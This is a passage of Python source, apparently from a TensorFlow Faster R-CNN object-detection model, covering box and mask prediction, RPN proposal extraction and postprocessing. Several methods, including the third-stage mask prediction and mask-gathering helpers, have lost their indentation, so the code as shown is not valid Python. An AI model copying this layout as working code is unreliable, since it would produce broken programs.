          which are not since we always pad the number of proposals to be
          `self.max_num_proposals` for each image.
        4) proposal_boxes: A float32 tensor of shape
          [batch_size, self.max_num_proposals, 4] representing
          decoded proposal bounding boxes in absolute coordinates.
        5) proposal_boxes_normalized: A float32 tensor of shape
          [batch_size, self.max_num_proposals, 4] representing decoded proposal
          bounding boxes in normalized coordinates. Can be used to override the
          boxes proposed by the RPN, thus enabling one to extract features and
          get box classification and prediction for externally selected areas
          of the image.
        6) box_classifier_features: a 4-D float32/bfloat16 tensor
          representing the features for each proposal.
      If self._return_raw_detections_during_predict is True, the dictionary
      will also contain:
        7) raw_detection_boxes: a 4-D float32 tensor with shape
          [batch_size, self.max_num_proposals, num_classes, 4] in normalized
          coordinates.
        8) raw_detection_feature_map_indices: a 3-D int32 tensor with shape
          [batch_size, self.max_num_proposals, num_classes].
    """
    # Post-process the RPN output into (padded) normalized proposal boxes.
    proposal_boxes_normalized, num_proposals = self._proposal_postprocess(
        rpn_box_encodings, rpn_objectness_predictions_with_background, anchors,
        image_shape, true_image_shapes)
    # Crop proposal features and run the second-stage box refiner/classifier.
    prediction_dict = self._box_prediction(rpn_features_to_crop,
                                           proposal_boxes_normalized,
                                           image_shape, true_image_shapes)
    prediction_dict['num_proposals'] = num_proposals
    return prediction_dict
  def _box_prediction(self, rpn_features_to_crop, proposal_boxes_normalized,
                      image_shape, true_image_shapes):
    """Predicts the output tensors from second stage of Faster R-CNN.
    Args:
      rpn_features_to_crop: A 4-D float32 or bfloat16 tensor with shape
        [batch_size, height, width, depth] representing image features to crop
        using the proposal boxes predicted by the RPN.
      proposal_boxes_normalized: A float tensor with shape [batch_size,
        max_num_proposals, 4] representing the (potentially zero padded)
        proposal boxes for all images in the batch.  These boxes are represented
        as normalized coordinates.
      image_shape: A 1D int32 tensors of size [4] containing the image shape.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.
    Returns:
      prediction_dict: a dictionary holding "raw" prediction tensors:
        1) refined_box_encodings: a 3-D float32 tensor with shape
          [total_num_proposals, num_classes, self._box_coder.code_size]
          representing predicted (final) refined box encodings, where
          total_num_proposals=batch_size*self._max_num_proposals. If using a
          shared box across classes the shape will instead be
          [total_num_proposals, 1, self._box_coder.code_size].
        2) class_predictions_with_background: a 3-D float32 tensor with shape
          [total_num_proposals, num_classes + 1] containing class
          predictions (logits) for each of the anchors, where
          total_num_proposals=batch_size*self._max_num_proposals.
          Note that this tensor *includes* background class predictions
          (at class index 0).
        3) proposal_boxes: A float32 tensor of shape
          [batch_size, self.max_num_proposals, 4] representing
          decoded proposal bounding boxes in absolute coordinates.
        4) proposal_boxes_normalized: A float32 tensor of shape
          [batch_size, self.max_num_proposals, 4] representing decoded proposal
          bounding boxes in normalized coordinates. Can be used to override the
          boxes proposed by the RPN, thus enabling one to extract features and
          get box classification and prediction for externally selected areas
          of the image.
        5) box_classifier_features: a 4-D float32/bfloat16 tensor
          representing the features for each proposal.
      If self._return_raw_detections_during_predict is True, the dictionary
      will also contain:
        6) raw_detection_boxes: a 4-D float32 tensor with shape
          [batch_size, self.max_num_proposals, num_classes, 4] in normalized
          coordinates.
        7) raw_detection_feature_map_indices: a 3-D int32 tensor with shape
          [batch_size, self.max_num_proposals, num_classes].
        8) final_anchors: a 3-D float tensor of shape [batch_size,
          self.max_num_proposals, 4] containing the reference anchors for raw
          detection boxes in normalized coordinates.
    """
    # Crop per-proposal features from the RPN feature map and flatten them
    # along the batch dimension for the box classifier.
    flattened_proposal_feature_maps = (
        self._compute_second_stage_input_feature_maps(
            rpn_features_to_crop, proposal_boxes_normalized))
    box_classifier_features = self._extract_box_classifier_features(
        flattened_proposal_feature_maps)
    # The box predictor may be either a Keras model or a slim-style predictor;
    # dispatch on its type.
    if self._mask_rcnn_box_predictor.is_keras_model:
      box_predictions = self._mask_rcnn_box_predictor(
          [box_classifier_features],
          prediction_stage=2)
    else:
      box_predictions = self._mask_rcnn_box_predictor.predict(
          [box_classifier_features],
          num_predictions_per_location=[1],
          scope=self.second_stage_box_predictor_scope,
          prediction_stage=2)
    refined_box_encodings = tf.squeeze(
        box_predictions[box_predictor.BOX_ENCODINGS],
        axis=1, name='all_refined_box_encodings')
    class_predictions_with_background = tf.squeeze(
        box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
        axis=1, name='all_class_predictions_with_background')
    absolute_proposal_boxes = ops.normalized_to_image_coordinates(
        proposal_boxes_normalized, image_shape, self._parallel_iterations)
    prediction_dict = {
        # Cast to float32 since features may be bfloat16 (see docstring).
        'refined_box_encodings': tf.cast(refined_box_encodings,
                                         dtype=tf.float32),
        'class_predictions_with_background':
        tf.cast(class_predictions_with_background, dtype=tf.float32),
        'proposal_boxes': absolute_proposal_boxes,
        'box_classifier_features': box_classifier_features,
        'proposal_boxes_normalized': proposal_boxes_normalized,
        # The proposals themselves serve as the reference anchors for the
        # second stage.
        'final_anchors': proposal_boxes_normalized
    }
    if self._return_raw_detections_during_predict:
      prediction_dict.update(self._raw_detections_and_feature_map_inds(
          refined_box_encodings, absolute_proposal_boxes, true_image_shapes))
    return prediction_dict
  def _raw_detections_and_feature_map_inds(
      self, refined_box_encodings, absolute_proposal_boxes, true_image_shapes):
    """Returns raw detections and feat map inds from where they originated.
    Args:
      refined_box_encodings: [total_num_proposals, num_classes,
        self._box_coder.code_size] float32 tensor.
      absolute_proposal_boxes: [batch_size, self.max_num_proposals, 4] float32
        tensor representing decoded proposal bounding boxes in absolute
        coordinates.
      true_image_shapes: [batch, 3] int32 tensor where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.
    Returns:
      A dictionary with raw detection boxes, and the feature map indices from
      which they originated.
    """
    # Un-flatten the per-proposal encodings back into per-image batches before
    # decoding them against the absolute proposal boxes.
    box_encodings_batch = tf.reshape(
        refined_box_encodings,
        [-1, self.max_num_proposals, refined_box_encodings.shape[1],
         self._box_coder.code_size])
    raw_detection_boxes_absolute = self._batch_decode_boxes(
        box_encodings_batch, absolute_proposal_boxes)
    # Normalize/clip per image, since each image has its own true shape.
    raw_detection_boxes_normalized = shape_utils.static_or_dynamic_map_fn(
        self._normalize_and_clip_boxes,
        elems=[raw_detection_boxes_absolute, true_image_shapes],
        dtype=tf.float32)
    # All boxes come from the single RPN feature map (see the `feature_maps`
    # field documented in `predict`), so every index is 0.
    detection_feature_map_indices = tf.zeros_like(
        raw_detection_boxes_normalized[:, :, :, 0], dtype=tf.int32)
    return {
        fields.PredictionFields.raw_detection_boxes:
            raw_detection_boxes_normalized,
        fields.PredictionFields.raw_detection_feature_map_indices:
            detection_feature_map_indices
    }
  def _extract_box_classifier_features(self, flattened_feature_maps):
    """Extracts second-stage box classifier features for cropped proposals.

    The Keras box-classifier feature extractor model is built lazily on the
    first call; if the feature extractor does not provide one (the getter
    returns a falsy value), this falls back to the feature extractor's
    `extract_box_classifier_features` API.

    Args:
      flattened_feature_maps: a float tensor of cropped per-proposal feature
        maps, flattened along the batch dimension.

    Returns:
      A float tensor of box classifier features for each proposal.
    """
    if self._feature_extractor_for_box_classifier_features == (
        _UNINITIALIZED_FEATURE_EXTRACTOR):
      self._feature_extractor_for_box_classifier_features = (
          self._feature_extractor.get_box_classifier_feature_extractor_model(
              name=self.second_stage_feature_extractor_scope))
    if self._feature_extractor_for_box_classifier_features:
      box_classifier_features = (
          self._feature_extractor_for_box_classifier_features(
              flattened_feature_maps))
    else:
      box_classifier_features = (
          self._feature_extractor.extract_box_classifier_features(
              flattened_feature_maps,
              scope=self.second_stage_feature_extractor_scope))
    return box_classifier_features
def _predict_third_stage(self, prediction_dict, image_shapes):
"""Predicts non-box, non-class outputs using refined detections.
For training, masks as predicted directly on the box_classifier_features,
which are region-features from the initial anchor boxes.
For inference, this happens after calling the post-processing stage, such
that masks are only calculated for the top scored boxes.
Args:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
image_shapes: A 2-D int32 tensors of shape [batch_size, 3] containing
shapes of images in the batch.
Returns:
prediction_dict: a dictionary that in addition to the input predictions
does hold the following predictions as well:
1) mask_predictions: a 4-D tensor with shape
[batch_size, max_detection, mask_height, mask_width] containing
instance mask predictions.
"""
if self._is_training:
curr_box_classifier_features = prediction_dict['box_classifier_features']
detection_classes = prediction_dict['class_predictions_with_background']
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
prediction_dict['mask_predictions'] = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
else:
detections_dict = self._postprocess_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
image_shapes)
prediction_dict.update(detections_dict)
detection_boxes = detections_dict[
fields.DetectionResultFields.detection_boxes]
detection_classes = detections_dict[
fields.DetectionResultFields.detection_classes]
rpn_features_to_crop = prediction_dict['rpn_features_to_crop']
batch_size = tf.shape(detection_boxes)[0]
max_detection = tf.shape(detection_boxes)[1]
flattened_detected_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, detection_boxes))
curr_box_classifier_features = self._extract_box_classifier_features(
flattened_detected_feature_maps)
if self._mask_rcnn_box_predictor.is_keras_model:
mask_predictions = self._mask_rcnn_box_predictor(
[curr_box_classifier_features],
prediction_stage=3)
else:
mask_predictions = self._mask_rcnn_box_predictor.predict(
[curr_box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=3)
detection_masks = tf.squeeze(mask_predictions[
box_predictor.MASK_PREDICTIONS], axis=1)
_, num_classes, mask_height, mask_width = (
detection_masks.get_shape().as_list())
_, max_detection = detection_classes.get_shape().as_list()
prediction_dict['mask_predictions'] = tf.reshape(
detection_masks, [-1, num_classes, mask_height, mask_width])
if num_classes > 1:
detection_masks = self._gather_instance_masks(
detection_masks, detection_classes)
detection_masks = tf.cast(detection_masks, tf.float32)
prediction_dict[fields.DetectionResultFields.detection_masks] = (
tf.reshape(tf.sigmoid(detection_masks),
[batch_size, max_detection, mask_height, mask_width]))
return prediction_dict
def _gather_instance_masks(self, instance_masks, classes):
"""Gathers the masks that correspond to classes.
Args:
instance_masks: A 4-D float32 tensor with shape
[K, num_classes, mask_height, mask_width].
classes: A 2-D int32 tensor with shape [batch_size, max_detection].
Returns:
masks: a 3-D float32 tensor with shape [K, mask_height, mask_width].
"""
_, num_classes, height, width = instance_masks.get_shape().as_list()
k = tf.shape(instance_masks)[0]
instance_masks = tf.reshape(instance_masks, [-1, height, width])
classes = tf.cast(tf.reshape(classes, [-1]), dtype=tf.int32)
gather_idx = tf.range(k) * num_classes + classes
return tf.gather(instance_masks, gather_idx)
  def _extract_rpn_feature_maps(self, preprocessed_inputs):
    """Extracts RPN features.
    This function extracts two feature maps: a feature map to be directly
    fed to a box predictor (to predict location and objectness scores for
    proposals) and a feature map from which to crop regions which will then
    be sent to the second stage box classifier.
    Args:
      preprocessed_inputs: a [batch, height, width, channels] image tensor.
    Returns:
      rpn_box_predictor_features: A 4-D float32 tensor with shape
        [batch, height, width, depth] to be used for predicting proposal boxes
        and corresponding objectness scores.
      rpn_features_to_crop: A 4-D float32 tensor with shape
        [batch, height, width, depth] representing image features to crop using
        the proposals boxes.
      anchors: A BoxList representing anchors (for the RPN) in
        absolute coordinates.
      image_shape: A 1-D tensor representing the input image shape.
    """
    image_shape = tf.shape(preprocessed_inputs)
    rpn_features_to_crop, self.endpoints = self._extract_proposal_features(
        preprocessed_inputs)
    feature_map_shape = tf.shape(rpn_features_to_crop)
    # Generate anchors over the spatial grid of the (single) RPN feature map.
    anchors = box_list_ops.concatenate(
        self._first_stage_anchor_generator.generate([(feature_map_shape[1],
                                                      feature_map_shape[2])]))
    # Extra conv on top of the backbone features for the RPN box predictor.
    rpn_box_predictor_features = (
        self._first_stage_box_predictor_first_conv(rpn_features_to_crop))
    return (rpn_box_predictor_features, rpn_features_to_crop,
            anchors, image_shape)
  def _extract_proposal_features(self, preprocessed_inputs):
    """Extracts first-stage (RPN) features from preprocessed images.

    The Keras proposal feature extractor model is built lazily on the first
    call; if the feature extractor does not provide one (the getter returns a
    falsy value), this falls back to the feature extractor's
    `extract_proposal_features` API.

    Args:
      preprocessed_inputs: a [batch, height, width, channels] image tensor.

    Returns:
      A (features, endpoints) 2-tuple; the endpoints dict is empty when the
      Keras model path is used.
    """
    if self._feature_extractor_for_proposal_features == (
        _UNINITIALIZED_FEATURE_EXTRACTOR):
      self._feature_extractor_for_proposal_features = (
          self._feature_extractor.get_proposal_feature_extractor_model(
              name=self.first_stage_feature_extractor_scope))
    if self._feature_extractor_for_proposal_features:
      proposal_features = (
          self._feature_extractor_for_proposal_features(preprocessed_inputs),
          {})
    else:
      proposal_features = (
          self._feature_extractor.extract_proposal_features(
              preprocessed_inputs,
              scope=self.first_stage_feature_extractor_scope))
    return proposal_features
  def _predict_rpn_proposals(self, rpn_box_predictor_features):
    """Adds box predictors to RPN feature map to predict proposals.
    Note resulting tensors will not have been postprocessed.
    Args:
      rpn_box_predictor_features: A 4-D float32 tensor with shape
        [batch, height, width, depth] to be used for predicting proposal boxes
        and corresponding objectness scores.
    Returns:
      box_encodings: 3-D float tensor of shape
        [batch_size, num_anchors, self._box_coder.code_size] containing
        predicted boxes.
      objectness_predictions_with_background: 3-D float tensor of shape
        [batch_size, num_anchors, 2] containing class
        predictions (logits) for each of the anchors.  Note that this
        tensor *includes* background class predictions (at class index 0).
    Raises:
      RuntimeError: if the anchor generator generates anchors corresponding to
        multiple feature maps.  We currently assume that a single feature map
        is generated for the RPN.
    """
    num_anchors_per_location = (
        self._first_stage_anchor_generator.num_anchors_per_location())
    # A single entry corresponds to a single RPN feature map (see Raises).
    if len(num_anchors_per_location) != 1:
      raise RuntimeError('anchor_generator is expected to generate anchors '
                         'corresponding to a single feature map.')
    if self._first_stage_box_predictor.is_keras_model:
      box_predictions = self._first_stage_box_predictor(
          [rpn_box_predictor_features])
    else:
      box_predictions = self._first_stage_box_predictor.predict(
          [rpn_box_predictor_features],
          num_anchors_per_location,
          scope=self.first_stage_box_predictor_scope)
    box_encodings = tf.concat(
        box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
    objectness_predictions_with_background = tf.concat(
        box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
        axis=1)
    # Squeeze out the size-1 dimension of the box encodings (axis 2).
    return (tf.squeeze(box_encodings, axis=2),
            objectness_predictions_with_background)
  def _remove_invalid_anchors_and_predictions(
      self,
      box_encodings,
      objectness_predictions_with_background,
      anchors_boxlist,
      clip_window):
    """Removes anchors that (partially) fall outside an image.
    Also removes associated box encodings and objectness predictions.
    Args:
      box_encodings: 3-D float tensor of shape
        [batch_size, num_anchors, self._box_coder.code_size] containing
        predicted boxes.
      objectness_predictions_with_background: 3-D float tensor of shape
        [batch_size, num_anchors, 2] containing class
        predictions (logits) for each of the anchors.  Note that this
        tensor *includes* background class predictions (at class index 0).
      anchors_boxlist: A BoxList representing num_anchors anchors (for the RPN)
        in absolute coordinates.
      clip_window: a 1-D tensor representing the [ymin, xmin, ymax, xmax]
        extent of the window to clip/prune to.
    Returns:
      box_encodings: 4-D float tensor of shape
        [batch_size, num_valid_anchors, self._box_coder.code_size] containing
        predicted boxes, where num_valid_anchors <= num_anchors
      objectness_predictions_with_background: 2-D float tensor of shape
        [batch_size, num_valid_anchors, 2] containing class
        predictions (logits) for each of the anchors, where
        num_valid_anchors <= num_anchors.  Note that this
        tensor *includes* background class predictions (at class index 0).
      anchors: A BoxList representing num_valid_anchors anchors (for the RPN) in
        absolute coordinates.
    """
    pruned_anchors_boxlist, keep_indices = box_list_ops.prune_outside_window(
        anchors_boxlist, clip_window)
    def _batch_gather_kept_indices(predictions_tensor):
      # Gather the surviving anchors' predictions for every image in the
      # batch; keep_indices is shared across images since anchors are.
      return shape_utils.static_or_dynamic_map_fn(
          functools.partial(tf.gather, indices=keep_indices),
          elems=predictions_tensor,
          dtype=tf.float32,
          parallel_iterations=self._parallel_iterations,
          back_prop=True)
    return (_batch_gather_kept_indices(box_encodings),
            _batch_gather_kept_indices(objectness_predictions_with_background),
            pruned_anchors_boxlist)
def _flatten_first_two_dimensions(self, inputs):
"""Flattens `K-d` tensor along batch dimension to be a `(K-1)-d` tensor.
Converts `inputs` with shape [A, B, ..., depth] into a tensor of shape
[A * B, ..., depth].
Args:
inputs: A float tensor with shape [A, B, ..., depth]. Note that the first
two and last dimensions must be statically defined.
Returns:
A float tensor with shape [A * B, ..., depth] (where the first and last
dimension are statically defined.
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(inputs)
flattened_shape = tf.stack([combined_shape[0] * combined_shape[1]] +
combined_shape[2:])
return tf.reshape(inputs, flattened_shape)
  def postprocess(self, prediction_dict, true_image_shapes):
    """Convert prediction tensors to final detections.

    This function converts raw predictions tensors to final detection results.
    See base class for output format conventions. Note also that by default,
    scores are to be interpreted as logits, but if a score_converter is used,
    then scores are remapped (and may thus have a different interpretation).

    If number_of_stages=1, the returned results represent proposals from the
    first stage RPN and are padded to have self.max_num_proposals for each
    image; otherwise, the results can be interpreted as multiclass detections
    from the full two-stage model and are padded to self._max_detections.

    Args:
      prediction_dict: a dictionary holding prediction tensors (see the
        documentation for the predict method. If number_of_stages=1, we
        expect prediction_dict to contain `rpn_box_encodings`,
        `rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
        and `anchors` fields. Otherwise we expect prediction_dict to
        additionally contain `refined_box_encodings`,
        `class_predictions_with_background`, `num_proposals`,
        `proposal_boxes` and, optionally, `mask_predictions` fields.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.

    Returns:
      detections: a dictionary containing the following fields
        detection_boxes: [batch, max_detection, 4]
        detection_scores: [batch, max_detections]
        detection_multiclass_scores: [batch, max_detections, 2]
        detection_anchor_indices: [batch, max_detections]
        detection_classes: [batch, max_detections]
          (this entry is only created if rpn_mode=False)
        num_detections: [batch]
        raw_detection_boxes: [batch, total_detections, 4]
        raw_detection_scores: [batch, total_detections, num_classes + 1]

    Raises:
      ValueError: If `predict` is called before `preprocess`.
    """
    with tf.name_scope('FirstStagePostprocessor'):
      if self._number_of_stages == 1:
        # RPN-only model: the (NMS-ed) proposals are the final detections.
        # `true_image_shapes` is passed for both image_shapes and
        # true_image_shapes since no padding distinction is needed here.
        (proposal_boxes, proposal_scores, proposal_multiclass_scores,
         num_proposals, raw_proposal_boxes,
         raw_proposal_scores) = self._postprocess_rpn(
             prediction_dict['rpn_box_encodings'],
             prediction_dict['rpn_objectness_predictions_with_background'],
             prediction_dict['anchors'], true_image_shapes, true_image_shapes)
        return {
            fields.DetectionResultFields.detection_boxes:
                proposal_boxes,
            fields.DetectionResultFields.detection_scores:
                proposal_scores,
            fields.DetectionResultFields.detection_multiclass_scores:
                proposal_multiclass_scores,
            fields.DetectionResultFields.num_detections:
                tf.cast(num_proposals, dtype=tf.float32),
            fields.DetectionResultFields.raw_detection_boxes:
                raw_proposal_boxes,
            fields.DetectionResultFields.raw_detection_scores:
                raw_proposal_scores
        }

    # TODO(jrru): Remove mask_predictions from _post_process_box_classifier.
    if (self._number_of_stages == 2 or
        (self._number_of_stages == 3 and self._is_training)):
      # Full two-stage path (also used at training time of a 3-stage model):
      # refine the proposals with the second-stage box classifier.
      with tf.name_scope('SecondStagePostprocessor'):
        mask_predictions = prediction_dict.get(box_predictor.MASK_PREDICTIONS)
        detections_dict = self._postprocess_box_classifier(
            prediction_dict['refined_box_encodings'],
            prediction_dict['class_predictions_with_background'],
            prediction_dict['proposal_boxes'],
            prediction_dict['num_proposals'],
            true_image_shapes,
            mask_predictions=mask_predictions)
      if 'rpn_features_to_crop' in prediction_dict and self._initial_crop_size:
        # Optionally expose per-detection cropped features as an extra output.
        detections_dict[
            'detection_features'] = self._add_detection_features_output_node(
                detections_dict[fields.DetectionResultFields.detection_boxes],
                prediction_dict['rpn_features_to_crop'])
      return detections_dict

    if self._number_of_stages == 3:
      # Post processing is already performed in 3rd stage. We need to transfer
      # postprocessed tensors from `prediction_dict` to `detections_dict`.
      # Remove any items from the prediction dictionary if they are not pure
      # Tensors.
      non_tensor_predictions = [
          k for k, v in prediction_dict.items() if not isinstance(v, tf.Tensor)]
      for k in non_tensor_predictions:
        tf.logging.info('Removing {0} from prediction_dict'.format(k))
        prediction_dict.pop(k)
      return prediction_dict
  def _add_detection_features_output_node(self, detection_boxes,
                                          rpn_features_to_crop):
    """Add detection features to outputs.

    This function extracts box features for each box in rpn_features_to_crop.
    It returns the extracted box features, reshaped to
    [batch size, max_detections, height, width, depth], and average pools
    the extracted features across the spatial dimensions and adds a graph node
    to the pooled features named 'pooled_detection_features'.

    Args:
      detection_boxes: a 3-D float32 tensor of shape
        [batch_size, max_detections, 4] which represents the bounding boxes.
      rpn_features_to_crop: A 4-D float32 tensor with shape
        [batch, height, width, depth] representing image features to crop using
        the proposals boxes.

    Returns:
      detection_features: a 5-D float32 tensor of shape
        [batch size, max_detections, height, width, depth] representing
        cropped image features.
    """
    with tf.name_scope('SecondStageDetectionFeaturesExtract'):
      # Crop+resize one feature patch per detection, flattened over
      # (batch, detection) pairs, then run the box-classifier feature
      # extractor over the patches.
      flattened_detected_feature_maps = (
          self._compute_second_stage_input_feature_maps(
              rpn_features_to_crop, detection_boxes))
      detection_features_unpooled = self._extract_box_classifier_features(
          flattened_detected_feature_maps)

      batch_size = tf.shape(detection_boxes)[0]
      max_detections = tf.shape(detection_boxes)[1]
      # Spatial average pool; the tf.identity name is a stable graph node
      # that downstream tools look up by name — do not rename it.
      detection_features_pool = tf.reduce_mean(
          detection_features_unpooled, axis=[1, 2])
      reshaped_detection_features_pool = tf.reshape(
          detection_features_pool,
          [batch_size, max_detections, tf.shape(detection_features_pool)[-1]])
      reshaped_detection_features_pool = tf.identity(
          reshaped_detection_features_pool, 'pooled_detection_features')

      # Un-flatten back to [batch, max_detections, h, w, depth] for return.
      reshaped_detection_features = tf.reshape(
          detection_features_unpooled,
          [batch_size, max_detections,
           tf.shape(detection_features_unpooled)[1],
           tf.shape(detection_features_unpooled)[2],
           tf.shape(detection_features_unpooled)[3]])

    return reshaped_detection_features
  def _postprocess_rpn(self,
                       rpn_box_encodings_batch,
                       rpn_objectness_predictions_with_background_batch,
                       anchors,
                       image_shapes,
                       true_image_shapes):
    """Converts first stage prediction tensors from the RPN to proposals.

    This function decodes the raw RPN predictions, runs non-max suppression
    on the result.

    Note that the behavior of this function is slightly modified during
    training --- specifically, we stop the gradient from passing through the
    proposal boxes and we only return a balanced sampled subset of proposals
    with size `second_stage_batch_size`.

    Args:
      rpn_box_encodings_batch: A 3-D float32 tensor of shape
        [batch_size, num_anchors, self._box_coder.code_size] containing
        predicted proposal box encodings.
      rpn_objectness_predictions_with_background_batch: A 3-D float tensor of
        shape [batch_size, num_anchors, 2] containing objectness predictions
        (logits) for each of the anchors with 0 corresponding to background
        and 1 corresponding to object.
      anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
        for the first stage RPN. Note that `num_anchors` can differ depending
        on whether the model is created in training or inference mode.
      image_shapes: A 2-D tensor of shape [batch, 3] containing the shapes of
        images in the batch.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.

    Returns:
      proposal_boxes: A float tensor with shape
        [batch_size, max_num_proposals, 4] representing the (potentially zero
        padded) proposal boxes for all images in the batch. These boxes are
        represented as normalized coordinates.
      proposal_scores: A float tensor with shape
        [batch_size, max_num_proposals] representing the (potentially zero
        padded) proposal objectness scores for all images in the batch.
      proposal_multiclass_scores: A float tensor with shape
        [batch_size, max_num_proposals, 2] representing the (potentially zero
        padded) proposal multiclass scores for all images in the batch.
      num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
        representing the number of proposals predicted for each image in
        the batch.
      raw_detection_boxes: [batch, total_detections, 4] tensor with decoded
        proposal boxes before Non-Max Suppression.
      raw_detection_scores: [batch, total_detections,
        num_classes_with_background] tensor of multi-class scores for raw
        proposal boxes.
    """
    # Insert a singleton "class" axis so _batch_decode_boxes (which expects a
    # per-class dimension) can be reused for the class-agnostic RPN.
    rpn_box_encodings_batch = tf.expand_dims(rpn_box_encodings_batch, axis=2)
    rpn_encodings_shape = shape_utils.combined_static_and_dynamic_shape(
        rpn_box_encodings_batch)
    tiled_anchor_boxes = tf.tile(
        tf.expand_dims(anchors, 0), [rpn_encodings_shape[0], 1, 1])
    proposal_boxes = self._batch_decode_boxes(rpn_box_encodings_batch,
                                              tiled_anchor_boxes)
    raw_proposal_boxes = tf.squeeze(proposal_boxes, axis=2)
    rpn_objectness_softmax = tf.nn.softmax(
        rpn_objectness_predictions_with_background_batch)
    # Index 1 is the "object" class; index 0 is background.
    rpn_objectness_softmax_without_background = rpn_objectness_softmax[:, :, 1]
    clip_window = self._compute_clip_window(image_shapes)
    additional_fields = {'multiclass_scores': rpn_objectness_softmax}
    (proposal_boxes, proposal_scores, _, _, nmsed_additional_fields,
     num_proposals) = self._first_stage_nms_fn(
         tf.expand_dims(raw_proposal_boxes, axis=2),
         tf.expand_dims(rpn_objectness_softmax_without_background, axis=2),
         additional_fields=additional_fields,
         clip_window=clip_window)
    if self._is_training:
      # Do not backprop through proposal coordinates; and (unless a hard
      # example miner will do it later) subsample a balanced minibatch of
      # proposals for the second stage.
      proposal_boxes = tf.stop_gradient(proposal_boxes)
      if not self._hard_example_miner:
        (groundtruth_boxlists, groundtruth_classes_with_background_list, _,
         groundtruth_weights_list
        ) = self._format_groundtruth_data(true_image_shapes)
        (proposal_boxes, proposal_scores,
         num_proposals) = self._sample_box_classifier_batch(
             proposal_boxes, proposal_scores, num_proposals,
             groundtruth_boxlists, groundtruth_classes_with_background_list,
             groundtruth_weights_list)
    # normalize proposal boxes
    def normalize_boxes(args):
      proposal_boxes_per_image = args[0]
      image_shape = args[1]
      normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
          box_list.BoxList(proposal_boxes_per_image), image_shape[0],
          image_shape[1], check_range=False).get()
      return normalized_boxes_per_image
    normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
        normalize_boxes, elems=[proposal_boxes, image_shapes], dtype=tf.float32)
    raw_normalized_proposal_boxes = shape_utils.static_or_dynamic_map_fn(
        normalize_boxes,
        elems=[raw_proposal_boxes, image_shapes],
        dtype=tf.float32)
    proposal_multiclass_scores = (
        nmsed_additional_fields.get('multiclass_scores')
        if nmsed_additional_fields else None)
    return (normalized_proposal_boxes, proposal_scores,
            proposal_multiclass_scores, num_proposals,
            raw_normalized_proposal_boxes, rpn_objectness_softmax)
  def _sample_box_classifier_batch(
      self,
      proposal_boxes,
      proposal_scores,
      num_proposals,
      groundtruth_boxlists,
      groundtruth_classes_with_background_list,
      groundtruth_weights_list):
    """Samples a minibatch for second stage.

    Iterates over the batch (via tf.unstack, so the batch size must be
    statically known) and, per image, samples up to
    `self._second_stage_batch_size` proposals, zero-padding when fewer are
    selected.

    Args:
      proposal_boxes: A float tensor with shape
        [batch_size, num_proposals, 4] representing the (potentially zero
        padded) proposal boxes for all images in the batch. These boxes are
        represented in absolute coordinates.
      proposal_scores: A float tensor with shape
        [batch_size, num_proposals] representing the (potentially zero
        padded) proposal objectness scores for all images in the batch.
      num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
        representing the number of proposals predicted for each image in
        the batch.
      groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
        of the groundtruth boxes.
      groundtruth_classes_with_background_list: A list of 2-D one-hot
        (or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
        class targets with the 0th index assumed to map to the background class.
      groundtruth_weights_list: A list of 1-D tensors of shape [num_boxes]
        indicating the weight associated with the groundtruth boxes.

    Returns:
      proposal_boxes: A float tensor with shape
        [batch_size, second_stage_batch_size, 4] representing the (potentially
        zero padded) proposal boxes for all images in the batch. These boxes
        are represented in absolute coordinates.
      proposal_scores: A float tensor with shape
        [batch_size, second_stage_batch_size] representing the (potentially zero
        padded) proposal objectness scores for all images in the batch.
      num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
        representing the number of proposals predicted for each image in
        the batch.
    """
    single_image_proposal_box_sample = []
    single_image_proposal_score_sample = []
    single_image_num_proposals_sample = []
    for (single_image_proposal_boxes,
         single_image_proposal_scores,
         single_image_num_proposals,
